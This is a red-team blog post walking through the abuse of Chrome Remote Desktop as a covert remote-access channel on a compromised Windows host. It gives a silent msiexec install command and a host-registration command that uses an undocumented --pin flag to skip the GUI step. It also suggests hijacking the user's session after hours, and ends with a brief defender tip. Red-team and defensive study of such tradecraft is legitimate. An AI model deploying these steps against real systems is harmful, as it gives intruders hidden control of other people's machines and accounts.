Abusing Chrome Remote Desktop on Red Team Operations: A Practical Guide
Table of contents
In this post, we’ll be exploring a practical technique for abusing Chrome Remote Desktop (also known as Google Remote Desktop) within a Red Team operation. I sometimes find myself needing to use legitimate software to achieve my goals, due to client restrictions or other preventive measures. This post is just meant to highlight how to actually use Chrome Remote Desktop on operations.
Primer – Chrome Remote Desktop
Chrome Remote Desktop is essentially a piece of software that you install and configure on a client that you originally download from https://remotedesktop.google.com/. After installing and configuring it, the compromised host connects to the server (cloud service), and you can click on it in the web portal to connect to it. Neat? I think so. Behind the scenes, it uses a proprietary protocol developed by Google, referred to internally as Chromoting. Based on the information I have found, it communicates over HTTPS and uses WebRTC for transferring data.
What are the requirements for getting started using Chrome Remote Desktop? The only thing you need is a Google account that everyone can create for free here. After creating the account, head over to here to download the software and start to use it. Another requirement is that the installer needs local administrator access on the client.
Walkthrough – Deploying It
Here is a step-by-step guide on how to deploy Chrome Remote Desktop with some tips along the way.
1. Access the setup page
The first step is to navigate to the Chrome Remote Desktop setup page and under the Set up via SSH menu option, click begin and then click on the MSI file for Windows to download the MSI file.
2. Download MSI File
3. Run the installer
Next, you need to install the MSI file on the target. How you do that depends on what C2 or other access you might have. For simplicity, I will assume you can run a direct command and provide you with the typical msiexec installer command. (Remember that you do require local administrator privileges):
msiexec /i chromeremotedesktophost.msi /qn4. Start the Chrome Remote Desktop client
Once you have installed it, you can go back to the Chrome Remote Desktop page and click next. The wizard will then ask you to authorize; click the Authorize button to continue.
5. Copy out the onboarding command
On the screen, you should see two (2) Windows commands and one (1) for Debian. Copy out the Windows (Cmd) command and paste it into Notepad. We are going to add something to the command before we send it to the client.
6. Adjust the command
The command you copied out should look something like this:
"%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="YOUR_UNIQUE_CODE" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME%If you run this, the problem is that this requires an additional step that needs to be done in the GUI and that is adding a PIN code. Example of what would happen:
7. Undocumented parameter
To overcome this, we can use an undocumented parameter (I have not found documentation on it). The undocumented parameter is --pin=111111. Note that you need at least six (6) digits in the pin. A complete command would look like:
"%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="YOUR_UNIQUE_CODE" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=111111This is how it should look when running it:
8. Connect to client
You should now see the client show up in the Chrome Remote Desktop Portal. Click on it, supply the PIN when prompted, and start to use remote desktop—almost like magic.
9. Remoting to the client
You will have to log in and take over the session of the user, so you will need to know the password of the user or log in as someone else. Ideally, you would want to check if the user has gone home for the day before taking over the desktop.
Conclusion
Chrome Remote Desktop does require some work to get it going, but it can be incredibly useful tool when doing Red Team operations in certain scenarios. The Chrome Remote Desktop has a pretty smooth experience with little lag when remoting over it.
For defenders, as always, I recommend AppLocker or other approve list solutions to prevent unauthorized installation of software. If you want to look and see if the software is already installed in your environment, it is called Chrome Remote Desktop Host.
